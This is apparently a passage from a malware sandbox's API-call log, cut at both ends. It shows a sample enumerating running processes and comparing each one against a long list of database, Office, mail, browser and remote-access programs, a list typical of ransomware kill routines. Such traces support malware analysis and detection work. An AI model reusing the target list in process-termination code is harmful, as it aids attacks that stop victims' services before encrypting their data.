mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.771] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="constitutedefeattgp.exe")) returned 1 [0112.772] lstrcmpiW (lpString1="constitutedefeattgp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.772] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="cooperation.exe")) returned 1 [0112.773] lstrcmpiW (lpString1="cooperation.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.773] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fox camp azerbaijan.exe")) returned 1 [0112.774] lstrcmpiW (lpString1="fox camp azerbaijan.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.774] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="territorystackpics.exe")) returned 1 [0112.775] lstrcmpiW (lpString1="territorystackpics.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.775] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="feof.exe")) returned 1 [0112.776] lstrcmpiW (lpString1="feof.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.776] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="capacity.exe")) returned 1 [0112.777] lstrcmpiW (lpString1="capacity.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.777] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="newmanspringfield.exe")) returned 1 [0112.779] lstrcmpiW (lpString1="newmanspringfield.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.779] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bare.exe")) returned 1 [0112.780] lstrcmpiW (lpString1="bare.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.780] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="exhibitions.exe")) returned 1 [0112.781] lstrcmpiW (lpString1="exhibitions.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.781] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rostermathematicalhu.exe")) returned 1 [0112.782] lstrcmpiW (lpString1="rostermathematicalhu.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.782] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bp-goal-conclusion.exe")) returned 1 [0112.783] lstrcmpiW (lpString1="bp-goal-conclusion.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.783] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0112.784] lstrcmpiW (lpString1="3dftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.784] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0112.785] lstrcmpiW (lpString1="absolutetelnet.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.785] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0112.786] lstrcmpiW (lpString1="alftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.786] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0112.787] lstrcmpiW (lpString1="barca.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, 